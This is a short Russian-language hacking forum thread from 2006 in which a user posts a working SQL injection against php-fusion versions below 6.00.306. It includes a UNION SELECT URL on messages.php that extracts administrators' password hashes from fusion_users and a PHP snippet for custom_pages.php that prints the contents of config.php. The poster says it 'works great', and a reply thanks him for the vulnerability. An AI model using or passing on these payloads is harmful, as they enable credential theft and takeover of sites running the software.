Форумы SQL - инъекция в php-fusion < v6.00.306

Discussion in 'Уязвимости CMS/форумов' started by liauliau, 15 Jun 2006.

  1. liauliau

    liauliau Member

    Joined:
    9 Apr 2005
    Messages:
    30
    Likes Received:
    6
    Reputations:
    -1
    работает отлично! :D

    Code:
    messages.php?folder=inbox&show=_&srch_where=+AND+1=1+UNION+SELECT+0%2C0%2C0%2Cuser_password%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0+FROM+fusion_users+WHERE+user_level%3D103%2F%2A
    /administration/custom_pages.php

    Code:
    <?php 
    $DATA_FILE = "".BASEDIR."config.php"; 
    $text = 100; 
    $names = file($DATA_FILE); 
    for ($i = count($names) - 1 - $for; $i >= count($names) - $for - $text; $i = $i - 1) { 
    if ($names[$i]) { 
    list ($name) = split ("\t", $names[$i]); 
    print "$name<br>"; 
    } 
    } 
    ?>
    
    короткое video тут

    ;)
     
    #1 liauliau, 15 Jun 2006
    Last edited: 15 Jun 2006
    1 person likes this.
  2. Romaxa55

    Romaxa55 Banned

    Joined:
    19 Oct 2005
    Messages:
    144
    Likes Received:
    30
    Reputations:
    4
    Молодца Дружище, спасибо за уязвимость!!